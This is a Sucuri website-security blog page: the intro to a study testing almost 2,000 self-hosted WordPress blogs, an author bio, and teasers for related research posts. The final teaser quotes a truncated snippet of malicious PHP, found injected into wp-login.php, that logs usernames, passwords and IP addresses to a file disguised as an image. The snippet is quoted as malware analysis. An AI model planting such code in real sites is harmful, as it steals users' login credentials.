Blog Security Stats – Taking almost 2k blogs to a security test

The goal of this research is to determine if bloggers are taking the security of their sites seriously. We focused on self-hosted WordPress blogs, since the ones from blogger, WordPress.com and others handle the security transparently for the users.

Available at Sucuri Research.

David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

IoT Home Router Botnet Leveraged in Large DDoS Attack

Daniel Cid
September 1, 2016

We have been monitoring a large-scale Layer 7 HTTPS flood attack (i.e., application level DDoS) against a customer over the past few weeks. It is…

Read the Post

How to Position Website Security for your Clients

New Guide on How to Position Website Security for Customers

Juliana Lewis
May 29, 2018

Website security is challenging, especially when dealing with a large network of sites. That is why we have created a guide for web professionals and…

Read the Post

Spam Doorway Manager

Luke Leal
July 25, 2019

While investigating a client’s compromised website, we saw a malicious file that was being used to manage an existing SEO spam doorway. We usually refer…

Read the Post

.htaccess Injector on Joomla and WordPress Websites

Eugene Wozniak
May 23, 2019

During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website,…

Read the Post

3-D Secure SMS-OTP Phishing

Luke Leal
March 9, 2020

One of our remediation analysts Eli Trevino recently discovered a phishing page informing victims about fake Netflix service disruptions, supposedly due to problems with the…

Read the Post

The Cost of a Hacked Website – Survey

Pilar Garcia
July 15, 2019

As part of our commitment to the website security community, we want to know the true impacts of a website compromise from the owner’s perspective.…

Read the Post

What Should You do if Your WordPress Site was Hacked?

Ashley Sand
January 19, 2022

These days WordPress infections are very common. In 2021, internetlivestats.com counted over 81 million websites hacked. If you’re one of the millions, you need to…

Read the Post

Camouflage does not have to be advanced to be effective

Luke Leal
January 12, 2017

Often times a malware author will try to provide some type of camouflage to their malware’s coding in an effort to disguise an unsuspecting eye…

Read the Post

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…

Read the Post